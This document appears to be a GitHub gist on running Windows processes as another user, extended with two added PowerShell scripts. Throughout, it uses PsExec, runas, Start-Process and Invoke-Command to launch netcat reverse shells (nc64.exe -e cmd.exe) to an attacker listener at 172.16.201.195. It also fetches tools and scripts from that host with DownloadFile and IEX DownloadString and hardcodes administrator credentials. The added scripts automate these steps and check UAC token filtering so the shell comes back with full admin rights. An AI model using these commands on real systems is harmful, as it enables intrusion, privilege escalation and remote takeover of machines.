@haxxinen
Created February 10, 2020 21:08
Run Windows process as another user.

1. Prerequisites

1.1. The target account must be enabled (the built-in Administrator is disabled by default; enable it from an elevated prompt with net user Administrator /active:yes)
>net user Administrator | findstr "active"
Account active               Yes
1.2. Info about domain and local host name
> wmic computersystem get domain
> systeminfo | findstr "Domain:"
> hostname
1.3. Downloads (DownloadFile returns nothing, so there is nothing for IEX to evaluate; the files land in the current directory)
>powershell (New-Object Net.WebClient).DownloadFile('http://172.16.201.195:8888/nc64.exe','nc64.exe')
>powershell (New-Object Net.WebClient).DownloadFile('http://172.16.201.195:8888/PsExec64.exe','PsExec64.exe')
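
The following PowerShell script is an added example, not part of the gist, that performs the section-1 checks in one go and adds the check a practitioner wants before picking a method: whether the chosen account will get a full administrator token at all (the built-in Administrator, RID 500, is exempt from UAC token filtering on network logons; other local admins are filtered unless LocalAccountTokenFilterPolicy is 1). The account name, tool server URL and the C:\Users\Public drop location are assumptions; the gist's own values are used as defaults.

```powershell
# Added example, not from the gist: one-shot prerequisite check for the local
# account the process will run as. Account name and tool server are lab
# assumptions (the gist's values are the defaults).
param(
    [string]$Account  = 'Administrator',
    [string]$ToolHost = 'http://172.16.201.195:8888'
)

function Test-RunAsPrereqs {
    param([string]$Account)

    # Win32_UserAccount works on PS 5.0 (Win10 10240), where Get-LocalUser is missing.
    $acct = Get-CimInstance Win32_UserAccount -Filter "LocalAccount=True AND Name='$Account'"
    if (-not $acct) { throw "No local account named '$Account'" }

    # Built-in Administrator is RID 500. It is exempt from the UAC filtering that
    # gives other local admins a medium-integrity token on network logons
    # (PsExec over ADMIN$, WinRM) unless LocalAccountTokenFilterPolicy is 1.
    $isRid500 = $acct.SID -match '-500$'
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
    $filterPolicy = [int]($pol.LocalAccountTokenFilterPolicy)   # missing value -> 0 (filtering on)

    $cs = Get-CimInstance Win32_ComputerSystem

    [pscustomobject]@{
        Account           = $acct.Caption        # e.g. DESKTOP-XXXX\Administrator
        Enabled           = -not $acct.Disabled
        IsBuiltinAdmin    = $isRid500
        TokenFilterPolicy = $filterPolicy
        FullTokenExpected = $isRid500 -or ($filterPolicy -eq 1)
        Hostname          = $cs.Name
        Domain            = $cs.Domain           # 'WORKGROUP' on a non-joined box
        PartOfDomain      = $cs.PartOfDomain
        WinRmRunning      = (Get-Service WinRM).Status -eq 'Running'
    }
}

function Get-Tool {
    # DownloadFile returns nothing, so there is nothing to pass to IEX; just call it.
    param([string]$Url, [string]$Dest)
    (New-Object Net.WebClient).DownloadFile($Url, $Dest)
    Get-Item $Dest
}

$r = Test-RunAsPrereqs -Account $Account
$r | Format-List
if (-not $r.Enabled) {
    Write-Warning "Account is disabled; run (elevated): net user $Account /active:yes"
}
if (-not $r.FullTokenExpected) {
    Write-Warning "$Account will likely get a UAC-filtered token over PsExec/WinRM; verify with whoami /groups"
}

# Drop the tools at a fixed absolute path every local user can read, because
# Start-Process -Credential and Invoke-Command do not run in this shell's cwd.
$dir = $env:PUBLIC      # C:\Users\Public
Get-Tool "$ToolHost/nc64.exe"     (Join-Path $dir 'nc64.exe')
Get-Tool "$ToolHost/PsExec64.exe" (Join-Path $dir 'PsExec64.exe')
```

Run it as the low-privileged user you already have a shell as; the WinRM and token-filter fields tell you up front whether sections 3 to 5 will give you a high-integrity shell or only a medium-integrity one.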

2. Expected result

# ncat -nlvp 7777
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8DA3 D4BA 9D5C 4D30 453A 2748 3DFA 8038 C47C C013
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 172.16.201.164.
Ncat: Connection from 172.16.201.164:50057.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Win10\Desktop>whoami
whoami
desktop-bmrp4pl\administrator

3. PsExec (run locally by targeting \\%COMPUTERNAME%; -u/-p are used both to reach the ADMIN$ share and as the account the process runs as, so a local admin other than the built-in Administrator is refused over the network unless LocalAccountTokenFilterPolicy is set to 1)

>PsExec64.exe -accepteula -d \\%COMPUTERNAME% -u WORKGROUP\Administrator -p admin "nc64.exe" -nd 172.16.201.195 7777 -e cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

nc64.exe started with process ID 1564.

4. Runas (reads the password from the console; it cannot be passed on the command line, so this needs an interactive session)

C:\Users\Win10\Desktop>runas /noprofile /user:WORKGROUP\Administrator "nc64.exe -nd 172.16.201.195 7777 -e cmd.exe"
Enter the password for WORKGROUP\Administrator:
Attempting to start nc64.exe -nd 172.16.201.195 7777 -e cmd.exe as user "WORKGROUP\Administrator" ...

5. PowerShell

5.1. Method 1 - A.ps1
$username = 'WORKGROUP\Administrator';
$password = 'admin';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Start-Process nc64.exe -NoNewWindow -Credential $credential -ArgumentList ('-nd','172.16.201.195','7777','-e','cmd.exe')
>echo IEX(New-Object Net.WebClient).DownloadString('http://172.16.201.195:8888/A.ps1') | powershell -noprofile -
5.2. Method 2 - B.ps1 (PSRemoting; the caller blocks until the script block returns, i.e. until the spawned shell exits)
$username = 'WORKGROUP\Administrator';
$password = 'admin';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
# Absolute path on purpose: the WinRM session does not start in the caller's working directory, so nc64.exe must actually be at C:\nc64.exe
Invoke-Command -ComputerName $env:computername -Credential $credential -ScriptBlock {C:\nc64.exe -nd 172.16.201.195 7777 -e cmd.exe}
>echo IEX(New-Object Net.WebClient).DownloadString('http://172.16.201.195:8888/B.ps1') | powershell -noprofile -
5.3. Check if PSRemoting is enabled
> [bool](Test-WSMan -ComputerName $env:computername -ErrorAction SilentlyContinue)
> get-service winrm | findstr "Running"
5.4. Enable PSRemoting (on the test machine, from an elevated PowerShell prompt; any one of these sets up the WinRM listener and firewall rule, and -SkipNetworkProfileCheck is required when the active network profile is Public)
> Enable-PSRemoting -SkipNetworkProfileCheck
> winrm quickconfig
> Enable-PSRemoting -force
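
As an added example that is not part of the gist, the script below combines methods 1 and 2 from section 5 and adds the check a practitioner wants before launching the payload: it first runs whoami.exe as the target account and parses the integrity level and the state of BUILTIN\Administrators, so a UAC-filtered token is noticed before the reverse shell comes back as a medium-integrity process. It then uses Invoke-Command when WinRM answers on the local box and falls back to Start-Process -Credential otherwise, returning in both cases so the calling shell is not tied up. The credentials, listener address, port and the C:\nc64.exe path are lab assumptions taken from the gist.

```powershell
# Added example, not from the gist. Credentials, listener and payload path
# are assumptions matching the gist's lab setup.
$username = 'WORKGROUP\Administrator'
$password = 'admin'
$cred = New-Object System.Management.Automation.PSCredential $username,
        (ConvertTo-SecureString $password -AsPlainText -Force)

function Get-TokenInfo {
    # Spawn whoami.exe as the target user and parse its output, so we know in
    # advance whether the payload will be a full admin or a UAC-filtered process.
    param([pscredential]$Credential)
    $out = Join-Path $env:TEMP ("whoami_{0}.txt" -f [guid]::NewGuid())
    Start-Process -FilePath "$env:SystemRoot\System32\whoami.exe" -ArgumentList '/groups' `
        -Credential $Credential -NoNewWindow -Wait -RedirectStandardOutput $out
    $text = Get-Content $out -Raw
    Remove-Item $out -ErrorAction SilentlyContinue
    [pscustomobject]@{
        User           = $Credential.UserName
        # "Mandatory Label\High Mandatory Level" for a full admin token, "Medium" if filtered
        IntegrityLevel = ([regex]::Match($text, 'Mandatory Label\\(\w+) Mandatory Level')).Groups[1].Value
        InAdminsGroup  = $text -match 'BUILTIN\\Administrators'
        # A filtered token lists the group as "Group used for deny only" instead
        AdminsEnabled  = $text -match 'BUILTIN\\Administrators.*Enabled group'
    }
}

function Start-AsUser {
    # Method 2 (PSRemoting) when WinRM is listening locally, method 1 otherwise.
    param([pscredential]$Credential, [string]$FilePath, [string[]]$ArgumentList)

    $winrm = [bool](Test-WSMan -ComputerName $env:COMPUTERNAME -ErrorAction SilentlyContinue)
    if ($winrm) {
        # -AsJob so the caller returns; the remote session has its own working
        # directory, which is why $FilePath must be absolute.
        $job = Invoke-Command -ComputerName $env:COMPUTERNAME -Credential $Credential -AsJob `
            -ScriptBlock { param($p, $a) & $p @a } -ArgumentList $FilePath, $ArgumentList
        return "WinRM job $($job.Id)"
    }
    $p = Start-Process -FilePath $FilePath -ArgumentList $ArgumentList -Credential $Credential `
        -NoNewWindow -PassThru
    return "Start-Process PID $($p.Id)"
}

$token = Get-TokenInfo -Credential $cred
$token | Format-List
if ($token.IntegrityLevel -ne 'High') {
    Write-Warning "$username gets a $($token.IntegrityLevel)-integrity token here; the shell will not be a full admin"
}
Start-AsUser -Credential $cred -FilePath 'C:\nc64.exe' `
    -ArgumentList '-nd','172.16.201.195','7777','-e','cmd.exe'
```

For the built-in Administrator on a default Windows 10 install the check reports High integrity with BUILTIN\Administrators enabled; for any other local admin it typically reports Medium with the group "used for deny only", which is the signal to set LocalAccountTokenFilterPolicy or pick a different account rather than wonder why the shell cannot write to C:\Windows.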